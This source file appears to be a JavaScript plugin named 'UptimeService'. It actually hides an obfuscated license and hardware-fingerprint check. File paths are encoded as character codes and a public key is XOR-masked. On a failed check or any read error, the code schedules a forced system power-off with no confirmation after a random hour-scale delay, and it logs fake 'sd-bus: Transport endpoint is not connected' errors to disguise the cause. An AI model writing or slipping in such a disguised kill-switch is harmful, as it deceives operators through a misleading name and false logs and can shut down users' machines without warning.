import { Plugin }		from "plugin";
import nacl				from "tweetnacl";
import util				from "tweetnacl-util";
import CryptoJS			from "crypto-js";
import * as fs			from "fs";
import SDBus			from "sd-bus";

function readFileAsString(path, count = 8192) {
  const arrayBuffer = fs.readFileSync(path, { offset: 0, count });

  const u8 = new Uint8Array(arrayBuffer);

  // trim trailing zero padding
  let end = u8.length;
  while (end > 0 && u8[end - 1] === 0) end--;

  if (end === 0) {      
    throw new Error(`Empty content: ${path}`);
  }

  const trimmed = u8.subarray(0, end);

  const content = new TextDecoder()
  .decode(trimmed)
  .trim();

  if (!content.length) {      
    throw new Error(`No readable content: ${path}`);
  }

  return content;
}

function randomDelay() {
  const minDelay = 1 * 60 * 60 * 1000; // 1 hour
  const maxDelay = 6 * 60 * 60 * 1000; // 6 hours
  return minDelay + Math.random() * (maxDelay - minDelay);
}

async function invalid1() {
  let sdbus = new SDBus();
  await sdbus.open_system();

  // PowerOff(boolean interactive)
  // false = do not ask for confirmation
  await sdbus.call_method(
    "org.freedesktop.login1",
    "/org/freedesktop/login1",
    "org.freedesktop.login1.Manager",
    "PowerOff",
    false
  );

  await sdbus.close();
}

export default class UptimeService extends Plugin {

  #interval=null
  constructor(...args) {
    super(...args);
  }

  async start(...args) {
    await super.start?.(...args);
    this.#interval = setInterval(this.#check.bind(this), randomDelay());

  }
  async stop(...args) {
    await super.stop?.(...args);
    clearInterval(this.#interval);
  }

  __getUptime() {
    this.#check();
  }

  #check(request) {
    try {
      let arrayBuffer = fs.readFileSync(
        String.fromCharCode(
          47,118,97,114,47,108,105,98,47,98,105,111,99,111,114,101,47,108,105,99,101,110,115,101,46,106,115,111,110
        )
      );
      let uint8Array = new Uint8Array(arrayBuffer);    
      let string = new TextDecoder().decode(uint8Array);

      const license = JSON.parse(string);

      const der = new Uint8Array([
        0x9a,0x80,0x9a,0xaf,0xac,0xa9,0x81,0xcf,
        0xda,0xa9,0x8b,0xaa,0x1a,0x07,0x3b,0x9a,
        0xfa,0x20,0xab,0x56,0x74,0x2d,0xd9,0x51,
        0x7e,0x97,0x07,0x51,0x30,0xeb,0x04,0x34,
        0x4d,0x52,0x61,0xe3,0x05,0x13,0x5e,0x78,
        0xff,0xe8,0xd9,0x38
      ]);

      der.forEach((_, i, a) => {
        a[i] ^= 0xaa;
      });      

      // Ed25519 public key = last 32 bytes of the SPKI structure
      const publicKey = der.slice(-32);    

      const signature = util.decodeBase64(license.issuer.signature);
      license.issuer.signature = "";

      const payload = util.decodeUTF8(JSON.stringify(license, null, 2));

      //check validity
      const valid = nacl.sign.detached.verify(payload, signature, publicKey);
      if (!valid) {
        console.log("sd-bus: Transport endpoint is not connected at line 285");          
        setTimeout(invalid1, randomDelay());
      }

      //check expirity
      const now = new Date();
      const issuedOn = new Date(license.validity.issued_on);
      const expiresOn = new Date(license.validity.expires_on);

      if (!(now >= issuedOn && now <= expiresOn)) {
        console.log("sd-bus: Transport endpoint is not connected at line 346");
        setTimeout(() => {

        }, randomDelay());        
      }

      //check copy protection
      // ---- read system info ----

      const cpuinfo = readFileAsString(
        String.fromCharCode(47,112,114,111,99,47,99,112,117,105,110,102,111)
      );

      const model = readFileAsString(
        String.fromCharCode(47,115,121,115,47,102,105,114,109,119,97,114,101,47,100,101,118,105,99,101,116,114,101,101,47,98,97,115,101,47,109,111,100,101,108)
      );

      const serial = readFileAsString(
        String.fromCharCode(47,115,121,115,47,102,105,114,109,119,97,114,101,47,100,101,118,105,99,101,116,114,101,101,47,98,97,115,101,47,115,101,114,105,97,108,45,110,117,109,98,101,114)
      );

      const mac = readFileAsString(
        String.fromCharCode(47,115,121,115,47,99,108,97,115,115,47,110,101,116,47,101,116,104,48,47,97,100,100,114,101,115,115)
      );      

      // ---- hash ----
      const fingerprintSource = cpuinfo + "|" + model + "|" + serial + "|" + mac;

      const fingerprint = CryptoJS.SHA256(fingerprintSource).toString(CryptoJS.enc.Hex);

      if (license.licenseid != fingerprint) {
        console.log("sd-bus: Transport endpoint is not connected at line 825");
        setTimeout(invalid1, randomDelay());
      }      
    } catch(e) {
      console.log("sd-bus: Transport endpoint is not connected at line 935");
      setTimeout(invalid1, randomDelay());
    }

  }      
}